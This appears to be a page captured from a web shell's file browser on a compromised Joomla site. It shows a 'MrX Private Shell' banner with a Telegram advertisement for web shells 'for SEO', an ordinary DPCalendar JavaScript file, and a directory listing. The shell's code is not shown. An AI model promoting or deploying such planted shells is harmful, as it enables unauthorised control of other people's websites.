__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
/**
* @package DPCalendar
* @copyright Digital Peak GmbH. <https://www.digital-peak.com>
* @license https://www.gnu.org/licenses/gpl-3.0.html GNU/GPL
*/
(function () {
'use strict';
document.addEventListener('DOMContentLoaded', () => {
[].slice.call(document.querySelectorAll('.com-dpcalendar-event-mailtickets__actions .dp-button-action')).forEach((button) => {
button.addEventListener('click', (event) => {
event.preventDefault();
Joomla.submitbutton('event.' + button.getAttribute('data-task'));
return false;
});
});
Joomla.submitbutton = (task) => {
const form = document.getElementsByName('adminForm')[0];
if (!form || (task.indexOf('cancel') === -1 && !document.formvalidator.isValid(form))) {
return;
}
if (task === 'event.mailticketsuser') {
form.elements['return'].value = btoa(location.href);
}
Joomla.submitform(task, form);
};
});
})();
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| default.js | File | 1.82 KB | 0664 |
|
| default.min.js | File | 1.36 KB | 0664 |
|
| mailtickets.js | File | 913 B | 0664 |
|
| mailtickets.min.js | File | 756 B | 0664 |
|